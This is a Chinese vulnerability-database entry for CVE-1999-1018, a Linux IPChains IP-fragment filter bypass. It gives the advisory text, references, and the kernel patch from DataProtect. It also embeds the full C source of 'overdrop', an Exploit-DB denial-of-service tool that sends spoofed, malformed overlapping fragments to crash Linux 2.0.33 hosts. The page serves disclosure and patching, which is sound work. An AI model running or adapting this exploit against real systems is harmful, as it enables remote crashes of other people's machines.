CVE-1999-1018
CVSS7.5
发布时间 :1999-07-27 00:00:00
修订时间 :2016-10-17 22:00:16
NMCOES    

[原文]IPChains in Linux kernels 2.2.10 and earlier does not reassemble IP fragments before checking the header information, which allows a remote attacker to bypass the filtering rules using several fragments with 0 offsets.


[CNNVD]Linux IPChains碎片重叠漏洞(CNNVD-199907-030)

        Linux kernels 2.2.10及之前版本中的IPChains存在漏洞。IPChains不能在检验头信息之前重新装配IP碎片,远程攻击者借助该漏洞绕过使用几个带有0位移碎片的过滤规则。

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

cpe:/o:linux:linux_kernel:2.2.0Linux Kernel 2.2
cpe:/o:linux:linux_kernel:2.2.10Linux Kernel 2.2.10

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1018
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-1999-1018
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-199907-030
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=93312523904591&w=2
(UNKNOWN)  BUGTRAQ  19990727 Linux 2.2.10 ipchains Advisory
http://www.securityfocus.com/bid/543
(VENDOR_ADVISORY)  BID  543

- 漏洞信息

Linux IPChains碎片重叠漏洞
高危 其他
1999-07-27 00:00:00 2005-10-20 00:00:00
远程  
        Linux kernels 2.2.10及之前版本中的IPChains存在漏洞。IPChains不能在检验头信息之前重新装配IP碎片,远程攻击者借助该漏洞绕过使用几个带有0位移碎片的过滤规则。

- 公告与补丁

        This patch was provided with the DataProtect advisory posted to BugTraq on July 27, 1999. The solution was incorporated into the 2.2.11 kernel, released in August 1999.
        *** linux.old/net/ipv4/ip_fw.c Wed Jun 9 05:33:07 1999
        --- linux/net/ipv4/ip_fw.c Fri Jul 23 19:20:45 1999
        ***************
        *** 37,42 ****
        --- 37,45 ----
         * 19-May-1999: Star Wars: The Phantom Menace opened. Rule num
         * printed in log (modified from Michael Hasenstein's patch).
         * Added SYN in log message. --RR
        + * 23-Jul-1999: Fixed small fragment security exposure opened on 15-May-1998.
        + * John McDonald
        + * Thomas Lopatic
         */
         /*
        ***************
        *** 644,650 ****
         default:
         size_req = 0;
         }
        ! offset = (ntohs(ip->tot_len) < (ip->ihl<<2)+size_req);
         }
         src = ip->saddr;
        --- 647,666 ----
         default:
         size_req = 0;
         }
        !
        ! /* If it is a truncated first fragment then it can be
        ! * used to rewrite port information, and thus should
        ! * be blocked.
        ! */
        !
        ! if (ntohs(ip->tot_len) < (ip->ihl<<2)+size_req)
        ! {
        ! if (!testing && net_ratelimit()) {
        ! printk("Suspect short first fragment.\n");
        ! dump_packet(ip,rif,NULL,NULL,0,0,0,0);
        ! }
        ! return FW_BLOCK;
        ! }
         }
         src = ip->saddr;

- 漏洞信息 (19301)

Linux kernel 2.0.33 IP Fragment Overlap Vulnerability (EDBID:19301)
linux remote
1998-04-17 Verified
0 Michal Zalewski
N/A [点击下载]
source: http://www.securityfocus.com/bid/376/info

Linux kernel 2.0.33 is vulnerable to a denial of service attack related to overlapping IP fragments. The bug is not in the handling of them itself, but the action taken when an oversized packet is recieved. A printk function is called containing a variable without any sort of wrapping or protection in function ip_glue. The consequences of this are a serious remote denial of service [ie, reboot of machine].


// overdrop by lcamtuf [Linux 2.0.33 printk abuse]
// ------------------------------------------------
// based on (reaped from) teardrop by route|daemon9

    #include <stdio.h> 
    #include <stdlib.h>
    #include <unistd.h>
    #include <string.h>
    #include <netdb.h>
    #include <netinet/in.h>
    #include <netinet/udp.h>
    #include <arpa/inet.h>
    #include <sys/types.h>
    #include <sys/time.h>
    #include <sys/socket.h>

    #define IP_MF   0x2000
    #define IPH     0x14
    #define UDPH    0x8
    #define PADDING 0x1c
    #define MAGIC   0x3
    #define COUNT   0xBEEF
    #define FRAG2   0xFFFF

void usage(char *name) {
      fprintf(stderr,"%s dst_ip [ -n how_many ] [ -s src_ip ]\n",name);
      exit(0);
}

u_long name_resolve(char *host_name) {
      struct in_addr addr;
      struct hostent *host_ent;
      if ((addr.s_addr=inet_addr(host_name))==-1) {
        if (!(host_ent=gethostbyname(host_name))) return (0);
        bcopy(host_ent->h_addr,(char *)&addr.s_addr,host_ent->h_length);
      }
      return (addr.s_addr);
}


void send_frags(int sock,u_long src_ip,u_long dst_ip,u_short src_prt,u_short dst_prt) {
      u_char *packet=NULL,*p_ptr=NULL;
      u_char byte;
      struct sockaddr_in sin;
      sin.sin_family=AF_INET;
      sin.sin_port=src_prt;
      sin.sin_addr.s_addr=dst_ip;
      packet=(u_char *)malloc(IPH+UDPH+PADDING);
      p_ptr=packet;
      bzero((u_char *)p_ptr,IPH+UDPH+PADDING);
      byte=0x45;
      memcpy(p_ptr,&byte,sizeof(u_char));
      p_ptr+=2;
      *((u_short *)p_ptr)=htons(IPH+UDPH+PADDING);
      p_ptr+=2;
      *((u_short *)p_ptr)=htons(242);
      p_ptr+=2;
      *((u_short *)p_ptr)|=htons(IP_MF);
      p_ptr+=2;
      *((u_short *)p_ptr)=0x40;
      byte=IPPROTO_UDP;
      memcpy(p_ptr+1,&byte,sizeof(u_char));
      p_ptr+=4;
      *((u_long *)p_ptr)=src_ip;
      p_ptr+=4;
      *((u_long *)p_ptr)=dst_ip;
      p_ptr+=4;
      *((u_short *)p_ptr)=htons(src_prt);
      p_ptr+=2;
      *((u_short *)p_ptr)=htons(dst_prt);
      p_ptr+=2;
      *((u_short *)p_ptr)=htons(8+PADDING);
      if (sendto(sock,packet,IPH+UDPH+PADDING,0,(struct sockaddr *)&sin,
		 sizeof(struct sockaddr))==-1) {
        perror("\nsendto");
        free(packet);
        exit(1);
      }
      p_ptr=&packet[2];
      *((u_short *)p_ptr)=htons(IPH+MAGIC+1);
      p_ptr+=4;
      *((u_short *)p_ptr)=htons(FRAG2);
      if (sendto(sock,packet,IPH+MAGIC+1,0,(struct sockaddr *)&sin,
		 sizeof(struct sockaddr))==-1) {
        perror("\nsendto");
        free(packet);
        exit(1);
      }
      free(packet);
}


int main(int argc, char **argv) {
      int one=1,count=0,i,rip_sock;
      u_long  src_ip=0,dst_ip=0;
      u_short src_prt=0,dst_prt=0;
      struct in_addr addr;
      fprintf(stderr,"overdrop by lcamtuf [based on teardrop by route|daemon9]\n\n");
      if((rip_sock=socket(AF_INET,SOCK_RAW,IPPROTO_RAW))<0) {
        perror("raw socket");
        exit(1);
      }
      if (setsockopt(rip_sock,IPPROTO_IP,IP_HDRINCL,(char *)&one,sizeof(one))<0) {
        perror("IP_HDRINCL");
        exit(1);
      }
      if (argc < 2) usage(argv[0]);
      if (!(dst_ip=name_resolve(argv[1]))) {
        fprintf(stderr,"Can't resolve destination address.\n");
        exit(1);
      }
      while ((i=getopt(argc,argv,"s:n:"))!=EOF) {
        switch (i) {
	case 'n':
            count   = atoi(optarg);
            break;
	case 's':
	  if (!(src_ip=name_resolve(optarg))) {
              fprintf(stderr,"Can't resolve source address.\n");
              exit(1);
	  }
            break;
	default:
            usage(argv[0]);
            break;
        }
      }
      srandom((unsigned)(time((time_t)0)));
      if (!count) count=COUNT;
      fprintf(stderr,"Sending oversized packets:\nFrom: ");
      if (!src_ip) fprintf(stderr,"       (random)"); else {
        addr.s_addr = src_ip;
        fprintf(stderr,"%15s",inet_ntoa(addr));
      }
      addr.s_addr = dst_ip;
      fprintf(stderr,"\n  To: %15s\n",inet_ntoa(addr));
      fprintf(stderr," Amt: %5d\n",count);
      fprintf(stderr,"[ ");
      for (i=0;i<count;i++) {
        if (!src_ip) send_frags(rip_sock,rand(),dst_ip,rand(),rand()); else
          send_frags(rip_sock,src_ip,dst_ip,rand(),rand());
        fprintf(stderr, "b00z ");
        usleep(500);
      }
      fprintf(stderr, "]\n");
      return (0);
}
		

- 漏洞信息

6104
ipchains Fragmentation Header Port Rewrite Filter Bypass
Local Access Required Input Manipulation
Loss of Integrity Third-Party Solution
Exploit Public Uncoordinated Disclosure

- 漏洞描述

- 时间线

1999-07-27 Unknow
1999-07-27 Unknow

- 解决方案

Products

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

Linux IPChains Fragment Overlap Vulnerability
Failure to Handle Exceptional Conditions 543
Yes No
1999-07-27 12:00:00 2009-07-11 12:56:00
First released in DataProtect security advisory #2, published on July 27, 1999.

- 受影响的程序版本

Linux kernel 2.2.10
+ Caldera OpenLinux 2.3
Linux kernel 2.2

- 漏洞讨论

There is a vulnerability in the linux firewall implementation in kernels 2.2.0 and above (IPChains). The vulnerability allows for an attacker to possibly send data to a blocked port. When a fragment is sent to a non-filtered port on a firewall with the IP_MF bit set and an offset of 0 with a full tcp header inside, it's possible to overlap the tcp port information. It is done by sending another fragment with an offset of 0, the IP_MF bit set and a length of 4 with the destination port number information. What happens is the following: when fragment A is sent to the firewall, it's passed onto the target host assuming it's going to the allowed port in the tcp header included in the fragment. The second fragment is sent along it's way as well, only to overlap the port information in the first while inside the reassembly chain. To finish off the attack, a fragment is sent with a normal offset (relative to the initial fragment) and an unset IP_MF bit. There are two conditions which need to be met to make this vulnerability exploitable: the linux kernel doing the firewalling needs to be configured so that defragmentation does not occur before passing through the filters and the firewall must allow non-first fragments to pass through.

The first two fragments sent may need to be reversed depending on the defragmentation implementation of the target host operating system.

- 漏洞利用

Currently the SecurityFocus staff are not aware of any exploits for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com.

- 解决方案

This patch was provided with the DataProtect advisory posted to BugTraq on July 27, 1999. The solution was incorporated into the 2.2.11 kernel, released in August 1999.

*** linux.old/net/ipv4/ip_fw.c Wed Jun 9 05:33:07 1999
--- linux/net/ipv4/ip_fw.c Fri Jul 23 19:20:45 1999
***************
*** 37,42 ****
--- 37,45 ----
* 19-May-1999: Star Wars: The Phantom Menace opened. Rule num
* printed in log (modified from Michael Hasenstein's patch).
* Added SYN in log message. --RR
+ * 23-Jul-1999: Fixed small fragment security exposure opened on 15-May-1998.
+ * John McDonald <jm@dataprotect.com>
+ * Thomas Lopatic <tl@dataprotect.com>
*/

/*
***************
*** 644,650 ****
default:
size_req = 0;
}
! offset = (ntohs(ip->tot_len) < (ip->ihl<<2)+size_req);
}

src = ip->saddr;
--- 647,666 ----
default:
size_req = 0;
}
!
! /* If it is a truncated first fragment then it can be
! * used to rewrite port information, and thus should
! * be blocked.
! */
!
! if (ntohs(ip->tot_len) < (ip->ihl<<2)+size_req)
! {
! if (!testing && net_ratelimit()) {
! printk("Suspect short first fragment.\n");
! dump_packet(ip,rif,NULL,NULL,0,0,0,0);
! }
! return FW_BLOCK;
! }
}

src = ip->saddr;

- 相关参考

     

     

    关于SCAP中文社区

    SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

    版权声明

    CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站